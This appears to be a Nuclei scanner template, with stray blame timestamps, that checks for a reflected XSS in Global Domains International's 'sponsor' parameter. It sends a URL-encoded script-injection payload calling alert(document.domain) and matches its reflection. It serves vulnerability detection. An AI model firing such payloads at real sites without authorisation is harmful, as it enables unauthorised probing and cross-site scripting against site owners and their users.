2021-12-18 09:21:08 +00:00
|
|
|
id: global-domains-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Global Domains International XSS
|
|
|
|
author: princechaddha
|
|
|
|
severity: medium
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://cxsecurity.com/issue/WLB-2018020247
|
2021-12-18 09:21:08 +00:00
|
|
|
tags: globaldomains,xss
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|